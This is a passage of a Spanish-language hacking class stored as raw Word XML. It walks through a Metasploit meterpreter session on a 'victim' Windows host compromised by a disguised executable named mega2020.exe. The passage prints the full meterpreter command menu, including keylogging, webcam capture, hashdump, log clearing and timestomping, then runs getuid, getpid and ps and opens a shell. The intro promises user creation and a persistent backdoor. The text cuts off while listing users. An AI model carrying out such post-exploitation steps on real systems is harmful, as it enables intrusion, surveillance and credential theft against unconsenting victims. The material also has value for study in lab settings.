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65A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:r w:rsidRPr="0030065A">
        <w:t>***************************************************************************************************</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:t>******************************************************</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:r w:rsidRPr="0030065A">
        <w:t xml:space="preserve">Esta clase va ligada a la anterior, ahora vamos a ver algunos </w:t>
      </w:r>
      <w:r w:rsidR="009D7D47" w:rsidRPr="0030065A">
        <w:t>comandos</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:t xml:space="preserve"> interesantes desde la </w:t>
      </w:r>
      <w:r w:rsidR="009D7D47" w:rsidRPr="0030065A">
        <w:t>sección</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:t xml:space="preserve"> de meterpreter, crearemos usuarios, le daremos privilegios, crearemos carpetas las eliminaremos y entre otras cosas vamos a crear una puerta trasera para que la </w:t>
      </w:r>
      <w:r w:rsidR="009D7D47" w:rsidRPr="0030065A">
        <w:t>victima</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:t xml:space="preserve"> tenga </w:t>
      </w:r>
      <w:r w:rsidR="009D7D47" w:rsidRPr="0030065A">
        <w:t>conexión</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D7D47" w:rsidRPr="0030065A">
        <w:t>automática</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:t xml:space="preserve"> con nosotros muy </w:t>
      </w:r>
      <w:r w:rsidR="009D7D47" w:rsidRPr="0030065A">
        <w:t>útil</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:t xml:space="preserve"> si es que se cae la </w:t>
      </w:r>
      <w:r w:rsidR="009D7D47" w:rsidRPr="0030065A">
        <w:t>sección</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:t xml:space="preserve"> iniciada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:r>
        <w:t>Con el comando help vamos a ver las opciones que nos brinda el meterpreter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>meterpreter &gt; help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>Core Commands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>=============</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Command                   Description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-------                   -----------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?                         Help menu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background                Backgrounds the current session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bg                        Alias for background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bgkill                    Kills a background meterpreter script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bglist                    Lists running background scripts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bgrun                     Executes a meterpreter script as a background thread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channel                   Displays information or control active channels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close                     Closes a channel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disable_unicode_encoding  Disables encoding of unicode strings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enable_unicode_encoding   Enables encoding of unicode strings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exit                      Terminate the meterpreter session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get_timeouts              Get the current session timeout values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guid                      Get the session GUID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help                      Help menu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info                      Displays information about a Post module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irb                       Open an interactive Ruby shell on the current session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load                      Load one or more meterpreter extensions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machine_id                Get the MSF ID of the machine attached to the session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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    migrate                   Migrate the server to another process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pivot                     Manage pivot listeners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pry                       Open the Pry debugger on the current session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quit                      Terminate the meterpreter session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read                      Reads data from a channel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resource                  Run the commands stored in a file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run                       Executes a meterpreter script or Post module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secure                    (Re)Negotiate TLV packet encryption on the session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sessions                  Quickly switch to another session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set_timeouts              Set the current session timeout values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sleep                     Force Meterpreter to go quiet, then re-establish session.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transport                 Change the current transport mechanism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use                       Deprecated alias for "load"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uuid                      Get the UUID for the current session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write                     Writes data to a channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>Stdapi: File system Commands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>============================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Command       Description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-------       -----------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cat           Read the contents of a file to the screen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cd            Change directory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checksum      Retrieve the checksum of a file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cp            Copy source to destination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dir           List files (alias for ls)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download      Download a file or directory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edit          Edit a file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getlwd        Print local working directory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getwd         Print working directory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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    lcd           Change local working directory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lls           List local files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lpwd          Print local working directory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ls            List files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mkdir         Make directory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mv            Move source to destination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pwd           Print working directory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rm            Delete the specified file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rmdir         Remove directory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search        Search for files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show_mount    List all mount points/logical drives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upload        Upload a file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>Stdapi: Networking Commands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>===========================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Command       Description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-------       -----------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arp           Display the host ARP cache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getproxy      Display the current proxy configuration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ifconfig      Display interfaces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ipconfig      Display interfaces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netstat       Display the network connections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portfwd       Forward a local port to a remote service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resolve       Resolve a set of host names on the target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route         View and modify the routing table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>Stdapi: System Commands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>=======================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Command       Description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-------       -----------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clearev       Clear the event log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drop_token    Relinquishes any active impersonation token.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execute       Execute a command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getenv        Get one or more environment variable values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getpid        Get the current process identifier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getprivs      Attempt to enable all privileges available to the current process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getsid        Get the SID of the user that the server is running as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getuid        Get the user that the server is running as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kill          Terminate a process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localtime     Displays the target system's local date and time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pgrep         Filter processes by name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pkill         Terminate processes by name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ps            List running processes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reboot        Reboots the remote computer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reg           Modify and interact with the remote registry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rev2self      Calls RevertToSelf() on the remote machine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shell         Drop into a system command shell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shutdown      Shuts down the remote computer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steal_token   Attempts to steal an impersonation token from the target process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suspend       Suspends or resumes a list of processes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sysinfo       Gets information about the remote system, such as OS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>Stdapi: User interface Commands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>===============================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Command        Description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-------        -----------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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    enumdesktops   List all accessible desktops and window stations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getdesktop     Get the current meterpreter desktop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idletime       Returns the number of seconds the remote user has been idle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keyboard_send  Send keystrokes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keyevent       Send key events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keyscan_dump   Dump the keystroke buffer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keyscan_start  Start capturing keystrokes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keyscan_stop   Stop capturing keystrokes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mouse          Send mouse events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screenshare    Watch the remote user's desktop in real time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screenshot     Grab a screenshot of the interactive desktop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setdesktop     Change the meterpreters current desktop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uictl          Control some of the user interface components</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>Stdapi: Webcam Commands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>=======================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Command        Description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-------        -----------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record_mic     Record audio from the default microphone for X seconds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webcam_chat    Start a video chat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webcam_list    List webcams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webcam_snap    Take a snapshot from the specified webcam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webcam_stream  Play a video stream from the specified webcam</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>Stdapi: Audio Output Commands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>=============================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Command       Description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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    -------       -----------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play          play an audio file on target system, nothing written on disk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>Priv: Elevate Commands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>======================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Command       Description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-------       -----------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getsystem     Attempt to elevate your privilege to that of local system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>Priv: Password database Commands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>================================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Command       Description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-------       -----------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hashdump      Dumps the contents of the SAM database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>Priv: Timestomp Commands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>========================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Command       Description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-------       -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r w:rsidRPr="00AE15F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>timestomp     Manipulate file MACE attributes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA0B14" w:rsidRDefault="00AA0B14" w:rsidP="00AE15F3">
      <w:r>
        <w:t>************************************************************************</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="009D7D47" w:rsidP="0030065A">
      <w:r>
        <w:t>Con</w:t>
      </w:r>
      <w:r w:rsidR="00AE15F3">
        <w:t xml:space="preserve"> el siguiente comando vamos a ver el nombr</w:t>
      </w:r>
      <w:r w:rsidR="001B0200">
        <w:t>e de usuario con el que accedimos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AA0B14" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0B14">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter &gt; getuid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE15F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server username: NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B0200" w:rsidRPr="001B0200" w:rsidRDefault="001B0200" w:rsidP="00AE15F3">
      <w:r w:rsidRPr="001B0200">
        <w:t xml:space="preserve">Con getpid vamos a ver ennumer del proseso </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="001B0200">
        <w:t>con el cual accedimos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AA0B14" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0B14">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>meterpreter &gt; getpid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE15F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Current pid: 1524</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B0200" w:rsidRDefault="001B0200" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="001B0200" w:rsidRPr="001B0200" w:rsidRDefault="001B0200" w:rsidP="00AE15F3">
      <w:r w:rsidRPr="001B0200">
        <w:t>Con ps veremos el listado de procesos que estan activos dentro de nuestra victim</w:t>
      </w:r>
      <w:r>
        <w:t>a entre esos vamos a ver el proceso del ejecutable mega2020.exe que creamos nosotros.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B0200" w:rsidRPr="001B0200" w:rsidRDefault="001B0200" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AA0B14" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0B14">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter &gt; ps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>Process List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>============</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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PID   PPID  Name              Arch  Session  User                           Path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---   ----  ----              ----  -------  ----                           ----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0     0     [System Process]                                                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4     0     System            x64   0                                       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104   2344  firefox.exe       x86   1        WIN-OLLU9KG29C5\Administrador  C:\Program Files (x86)\Mozilla Firefox\firefox.exe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208   4     smss.exe          x64   0                                       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308   300   csrss.exe         x64   0                                       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368   476   svchost.exe       x64   0        NT AUTHORITY\SERVICIO LOCAL    C:\Windows\System32\svchost.exe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372   364   csrss.exe         x64   1                                       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380   300   wininit.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\wininit.exe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408   364   winlogon.exe      x64   1        NT AUTHORITY\SYSTEM            C:\Windows\System32\winlogon.exe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476   380   services.exe      x64   0                                       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484   380   lsass.exe         x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\lsass.exe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540   476   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe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572   476   svchost.exe       x64   0        NT AUTHORITY\Servicio de red   C:\Windows\System32\svchost.exe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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 680   408   dwm.exe           x64   1        Window Manager\DWM-1           C:\Windows\System32\dwm.exe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700   476   svchost.exe       x64   0        NT AUTHORITY\SERVICIO LOCAL    C:\Windows\System32\svchost.exe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744   476   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe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808   476   svchost.exe       x64   0        NT AUTHORITY\SERVICIO LOCAL    C:\Windows\System32\svchost.exe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872   476   svchost.exe       x64   0        NT AUTHORITY\Servicio de red   C:\Windows\System32\svchost.exe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1012  476   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe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1040  476   spoolsv.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\spoolsv.exe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1072  476   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe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1092  476   dfsrs.exe         x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\dfsrs.exe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1132  104   firefox.exe       x86   1        WIN-OLLU9KG29C5\Administrador  C:\Program Files (x86)\Mozilla Firefox\firefox.exe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1168  476   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe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1192  476   inetinfo.exe      x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\inetsrv\inetinfo.exe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1252  476   svchost.exe       x64   0        NT AUTHORITY\Servicio de red   C:\Windows\System32\svchost.exe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1260  2544  conhost.exe       x64   1        WIN-OLLU9KG29C5\Administrador  C:\Windows\System32\conhost.exe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1288  476   svchost.exe       x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe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1328  476   wlms.exe          x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\wlms\wlms.exe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1524  2412  mega2020.exe      x86   1        WIN-OLLU9KG29C5\Administrador  C:\Users\Administrador\Downloads\mega2020.exe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1680  476   dfssvc.exe        x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\dfssvc.exe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1812  476   vds.exe           x64   0        NT AUTHORITY\SYSTEM            C:\Windows\System32\vds.exe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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 1840  476   sppsvc.exe        x64   0                                       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1972  476   svchost.exe       x64   0        NT AUTHORITY\Servicio de red   C:\Windows\System32\svchost.exe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2060  104   firefox.exe       x86   1        WIN-OLLU9KG29C5\Administrador  C:\Program Files (x86)\Mozilla Firefox\firefox.exe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2236  744   taskhostex.exe    x64   1        WIN-OLLU9KG29C5\Administrador  C:\Windows\System32\taskhostex.exe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2260  2412  notepad.exe       x64   1        WIN-OLLU9KG29C5\Administrador  C:\Windows\System32\notepad.exe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2412  2324  explorer.exe      x64   1        WIN-OLLU9KG29C5\Administrador  C:\Windows\explorer.exe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2544  2412  cmd.exe           x64   1        WIN-OLLU9KG29C5\Administrador  C:\Windows\System32\cmd.exe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2668  476   msdtc.exe         x64   0        NT AUTHORITY\Servicio de red   C:\Windows\System32\msdtc.exe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2792  2412  WzPreloader.exe   x64   1        WIN-OLLU9KG29C5\Administrador  C:\Program Files\WinZip\WzPreloader.exe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3048  104   firefox.exe       x86   1        WIN-OLLU9KG29C5\Administrador  C:\Program Files (x86)\Mozilla Firefox\firefox.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B0200" w:rsidRPr="001B0200" w:rsidRDefault="001B0200" w:rsidP="00AE15F3">
      <w:r w:rsidRPr="001B0200">
        <w:t>Luegao vamos a abrir una shell para hacer algunos trabajos en la victima</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B0200" w:rsidRPr="001B0200" w:rsidRDefault="001B0200" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AA0B14" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0B14">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter &gt; shell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>Process 2820 created.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>Channel 2 created.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>Microsoft Windows [Versi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE15F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n 6.3.9600]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r w:rsidRPr="00AE15F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(c) 2013 Microsoft Corporation. </w:t>
      </w:r>
      <w:r>
        <w:t>Todos los derechos reservados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="001B0200" w:rsidP="00AE15F3">
      <w:r>
        <w:t>Ahora comenzamos a movernos dentro de los directorios de Windows. “ recuerden que ustedes van a aparecer en la carpeta de descarga de Windows”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>C:\Windows\system32&gt;cd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>cd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>C:\Windows\system32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>C:\Windows\system32&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t>cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="001B0200" w:rsidRDefault="001B0200" w:rsidP="00AE15F3">
      <w:r>
        <w:t>listamos las carpetas para ver su contenido..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B0200" w:rsidRDefault="001B0200" w:rsidP="00AE15F3"/>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AA0B14" w:rsidRDefault="001B0200" w:rsidP="00AE15F3">
      <w:r w:rsidRPr="001B0200">
        <w:t>ahora que estamos en la carpeta descarga vamos a trabajar dentro de ella….</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AA0B14" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0B14">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Administrador\Downloads&gt;DIR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>DIR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRPr="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>07/12/2019  08:06 p.m.    &lt;DIR&gt;          ..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>06/12/2019  05:09 p.m.            73.802 mega2020.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r w:rsidRPr="00AE15F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">05/12/2019  08:49 p.m.               </w:t>
      </w:r>
      <w:r>
        <w:t>136 privado.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t xml:space="preserve">               2 archivos         73.938 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:r>
        <w:t xml:space="preserve">               2 dirs  46.035.324.928 bytes libres</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3"/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           2 archivos         73.938 bytes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 xml:space="preserve">               2 dirs  46.035.324.928 bytes libres</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE15F3" w:rsidRDefault="00AE15F3" w:rsidP="00AE15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00595C48" w:rsidRPr="00595C48" w:rsidRDefault="00595C48" w:rsidP="00AE15F3">
      <w:r w:rsidRPr="00595C48">
        <w:t xml:space="preserve">Ahora vamos a ver los usuarios que tiene la </w:t>
      </w:r>
      <w:r w:rsidR="009D7D47" w:rsidRPr="00595C48">
        <w:t>victima</w:t>
      </w:r>
      <w:r w:rsidRPr="00595C48">
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595C48" w:rsidRPr="00595C48" w:rsidRDefault="00595C48" w:rsidP="00AE15F3"/>
